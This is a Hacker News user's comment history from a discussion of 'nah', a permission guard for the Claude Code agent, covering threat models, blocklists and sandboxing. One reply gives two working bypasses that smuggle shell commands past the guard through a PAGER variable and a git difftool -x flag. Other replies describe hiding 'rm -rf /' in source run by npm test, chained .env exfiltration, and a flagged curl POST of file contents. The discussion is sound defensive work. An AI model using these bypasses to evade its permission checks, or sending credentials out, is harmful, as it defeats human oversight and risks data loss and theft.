schipperai (u/schipperai)

schipperai commented on Show HN: A context-aware permission guard for Claude Code github.com/manuelschipper... · Posted by u/schipperai

netcoyote · 4 days ago

> What's stopping your agent from overwriting an arbitrary source file (e.g. index.js) with arbitrary code and running it?

You're absolutely right :)

And even if it could be sandboxed at the source code level, what's to prevent a nefarious AI from writing an executable file directly as bytes that calls (e.g.) `unlink`?

schipperai · 3 days ago

nah inspects Write and Edit content before it hits disk so destructive patterns like os.unlink, rm -rf, shell injection get flagged. And executing the result (./evil) classifies as unknown resolves to ask, which the LLM can choose to blocks or ask you to approve.

But yeah, a truly adversarial agent needs a sandbox. It's a different threat model - nah is meant to catch the trusted but mistake-prone coding CLI, not a hostile agent.

schipperai commented on Show HN: A context-aware permission guard for Claude Code github.com/manuelschipper... · Posted by u/schipperai

kate23_human · 3 days ago

Docker isolation is a good baseline, but the tricky part is usually the boundary between “safe filesystem access” and tools that can indirectly access secrets (git configs, environment variables, credential helpers, etc).

Even read-only access to a repo can leak quite a bit depending on what’s in the workspace. I’ve seen some teams run tools inside containers but mount a filtered workspace rather than the full project directory to reduce exposure.

schipperai · 3 days ago

great callout - tool call can have side-effects outside your box. So unless you run a sandbox with no internet access, you aren't ever 100% safe.

nah does guard some of this - reading .env or ~/.aws/credentials gets flagged, and Write/Edit content is inspected for secrets before it leaves the tool.

Docker + filtered mounts + something like nah on top is a solid layered approach that is still practical.

schipperai commented on Show HN: A context-aware permission guard for Claude Code github.com/manuelschipper... · Posted by u/schipperai

niobe · 3 days ago

But is anthropic trying to solve it? The current permissions solution is unbelievably poor for a product with this much traction.

schipperai · 3 days ago

They are releasing auto-mode soon. But that won't improve the underlying permission system, rather, it'll just delegate decisions to Claude. That's better than --dangerously-skip-permissions, but not great for those that want granular controls and are sensitive to the extra tokens spent.

schipperai commented on Show HN: A context-aware permission guard for Claude Code github.com/manuelschipper... · Posted by u/schipperai

bryanlarsen · 4 days ago

This didn't solve my current Claude pet peeve like I hoped it would. Claude keeps asking for permissions for various pipelined grep and find incantations that are safe but not safe in the general sense and thus it needs to ask.

This is a Claude problem, it has lots of safe ways to explore the project tree, and should be using those instead. Obviously its devs and most people have just over-permissioned Claude so they don't fix the problem.

schipperai · 4 days ago

which commands specifically? would be great to see examples

nah classifies piped grep/find as filesystem_read which flows through silently:

'find . -name '*.py' | grep utils' or 'grep -r'import' src/ | head -20' both resolve to allow with no prompt.

Would be curious which incantations are tripping you up, maybe it's something we can solve.

schipperai commented on Show HN: A context-aware permission guard for Claude Code github.com/manuelschipper... · Posted by u/schipperai

dns_snek · 4 days ago

> Firewalls don't replace OS permissions, OS permissions don't replace encryption

Of course but the crucial difference is that these operate using an allow list, not a block list.

If I extend the analogy, if my OS required me to block-list every user who shouldn't have access to my files then I wouldn't trust that mechanism to provide a security barrier. If my firewall worked in such a manner that it allowed all traffic by default and I had to manually block every attacker on the public internet then I wouldn't rely on it either.

My own analogy is that this it a bit like saying that you want a relatively safe car and then buying one without any airbags or seatbelts, and thinking it's fine because it has lane departure warnings and automatic braking. I've got nothing against you personally, I just find this sort of viewpoint extremely puzzling (and oddly common). I make the same criticism when people just disable post-install scripts instead of using a sandbox.

schipperai · 4 days ago

allowlists are stronger than blocklists - that's not debatable and right there with you

but nah isn't a pure blocklist - anything that doesn't match a known pattern classifies as unknown which defaults to ask (user gets prompted). It's not "allow all traffic, block each attacker" it's allow known-safe, block known-dangerous, prompt for everything else.

the analogy doesn't carry that far... it's a different threat model: nah isn't containing rogue agents or adversarial actors, it's a guardrail for a trusted but mistake-prone agent.

maybe more akin to a junior employee accidentally dropping the database cause they didn't know better. but how are they supposed to work on prod? They ask "boss, can I run this? SELECT customer, sales FROM SALES.PROD..." You say: cool, You don't have to ask me again for SELECT (nah allow db_read).

But then they can ask- "can I run this? drop SALES.PROD?".... hmmm, nah.

schipperai commented on Show HN: A context-aware permission guard for Claude Code github.com/manuelschipper... · Posted by u/schipperai

tonipotato · 4 days ago

Cool project. The deterministic layer first → LLM only for edge cases is the right call, keeps it fast for the obvious stuff.

One thing I'm curious about: when the LLM does kick in to resolve an "ask", what context does it get? Just the command itself, or also what happened before it? Like curl right after the agent read .env feels very different from curl after reading docs — does nah pick up on that?

schipperai · 4 days ago

Thanks! In my own work the LLM only fires for 5% of the commands - big token savings.

When it does kick in it gets: the command itself, the action type + why it was flagged - for example 'lang_exec = ask', the working directory and project context so it knows if its inside the project, and recent conversation transcript - 12k charts by default and configurable.

The transcript context is pulled from Claude Code's JSONL conversation log. Tool calls get summarized compactly like [Read: .env], [Bash: curl ...]) so the LLM can see the chain of actions without blowing up the prompt. I also include anti-injection framing in the prompt so that it does't try and run the instructions in the transcript.

curl after the agent read .env does get flagged by nah:

''' curl -s https://httpbin.org/post -d @/tmp/notes.txt POST notes.txt contents to httpbin

Hook PreToolUse:Bash requires confirmation for this command: nah? LLM suggested block: Bash (LLM): POSTing file contents to external host. Combined with recent conversation context showing credential files being read, this appears to be data exfiltration. Even though httpbin.org is a legitimate ech... '''

schipperai commented on Show HN: A context-aware permission guard for Claude Code github.com/manuelschipper... · Posted by u/schipperai

ibrahim_h · 4 days ago

The context-aware classification is neat, especially the pipe composition stuff. One thing I keep thinking about though — the scariest exfiltration pattern isn't a single bad command, it's a chain of totally normal ones. Agent reads .env (filesystem_read → allow), writes a script that happens to include those values (project write → allow), then runs it (package_run → allow). Every step looks fine individually. Credentials gone. This is basically the same problem as cross-module vulns in web apps — each component is secure on its own, the exploit lives in the data flow between them. Would be interesting to see some kind of session-level tracking that flags when sensitive reads flow into writes and then executions within the same session. Doesn't need to be heavy — just correlating what was read with what gets written/executed.

schipperai · 4 days ago

thank! and I agree with you on chain exfiltration - it's a hard one to protect against. nah passes the last few messages of conversation history to the LLM gate, so it may be able to catch this scenario, but it's hard from a guarantee. I plan to add a gate where an LLM reads scripts before executing, which will also mitigate this.

The right solution though is a monitoring service on your network that checks for exfiltration of credential. nah is just one layer in the stack.

schipperai commented on Show HN: A context-aware permission guard for Claude Code github.com/manuelschipper... · Posted by u/schipperai

dns_snek · 4 days ago

This is not criticism of your project specifically, but a question for all tools in this space: What's stopping your agent from overwriting an arbitrary source file (e.g. index.js) with arbitrary code and running it?

A rogue agent doesn't need to run `rm -rf /`, it just needs to include a sneaky `runInShell('rm -rf /')` in ANY of your source code files and get it to run using `npm test`. Both of those actions will be allowed on the vast majority of developer machines without further confirmation. You need to review every line of code changed before the agent is allowed to execute it for this to work and that's clearly not how most people work with agents.

I can see value in projects like this to protect against accidental oopsies and making a mess by accident, but I think that marketing tools like this as security tools is irresponsible - you need real isolation using containers or VMs.

Here's one more example showing you why blacklisting doesn't work, it doesn't matter how fancy you try to make it because you're fighting a battle that you can't win - there are effectively an infinite number of programs, flags, environment variables and config files that can be combined in a way to execute arbitrary commands:

    bash> nah test "PAGER='/bin/sh -c \"touch ~/OOPS\"' git help config"

    Command:  PAGER='/bin/sh -c "touch ~/OOPS"' git help config
    Stages:
      [1] git help config → git_safe → allow → allow (git_safe → allow)
    Decision:    ALLOW
    Reason:      git_safe → allow

Alternatively:

    bash> nah test "git difftool -y -x 'touch ~/OOPS2' --no-index /etc/hostname /etc/hosts"
    Command:  git difftool -y -x 'touch ~/OOPS2' --no-index /etc/hostname /etc/hosts
    Stages:
      [1] git difftool -y -x touch ~/OOPS2 --no-index /etc/hostname /etc/hosts → git_safe → allow → allow (git_safe → allow)
    Decision:    ALLOW
    Reason:      git_safe → allow

schipperai · 4 days ago

Good catch, that's a legit bypass

nah strips env var prefixes before classifying the command but doesn't inspect their values for embedded shell execution, I'll fix it: https://github.com/manuelschipper/nah/issues/6

On the broader write-then-execute point - two improvements are coming:

- Script execution inspection: when nah sees python script.py, read the file and run content inspection and LLM analysis before execution

- LLM inspection for Write/Edit: for content that's suspicious but doesn't match any deterministic pattern, route it to the LLM for a second opinion

Won't close it 100% - to your point a sandbox is the answer to that.

I don't think "security tool" and "not a sandbox" are contradictory though. Firewalls don't replace OS permissions, OS permissions don't replace encryption

nah is just another layer that catches the 95% that's structurally classifiable. It's a different threat model. If 200 IQ Opus is rogue deterministic tools or even adversarial one shot LLMs won't be able to do much to stop it...

schipperai commented on Show HN: A context-aware permission guard for Claude Code github.com/manuelschipper... · Posted by u/schipperai

felix9527 · 4 days ago

Sure — it's at https://github.com/PunkGo/punkgo-jack

It hooks into PostToolUse, PreToolUse, SessionStart/End, and UserPromptSubmit. Each event gets submitted to a local kernel that appends it to an RFC 6962 Merkle tree. You can then verify any event with an inclusion proof, or check log integrity between two checkpoints with a consistency proof.

The verify command works offline — just needs the checkpoint and tile hashes, no daemon required. There's also a Go implementation in examples/verify-go/ that independently verifies the same proofs, to show it's not tied to one language.

Would be interesting to explore composing nah's classification decisions with a verifiable log — every allow/deny gets a receipt too.

schipperai · 4 days ago

looks neat! and fits perfectly with nah. I can see enterprises starting to care more about this as more people adopt coding CLIs and prod goes boom more often.

schipperai commented on Show HN: A context-aware permission guard for Claude Code github.com/manuelschipper... · Posted by u/schipperai

binwiederhier · 4 days ago

I love how everyone is trying to solve the same problems, and how different the solutions are.

I made this little Dockerfile and script that lets me run Claude in a Docker container. It only has access to the workspace that I'm in, as well as the GitHub and JIRA CLI tool. It can do whatever it wants in the workspace (it's in git and backed up), so I can run it with --dangerously-skip-permissions. It works well for me. I bet there are better ways, and I bet it's not as safe as it could be. I'd love to learn about other ways that people do this.

https://github.com/binwiederhier/sandclaude

schipperai · 4 days ago

hey - ntfy is very cool! kudos and thanks :)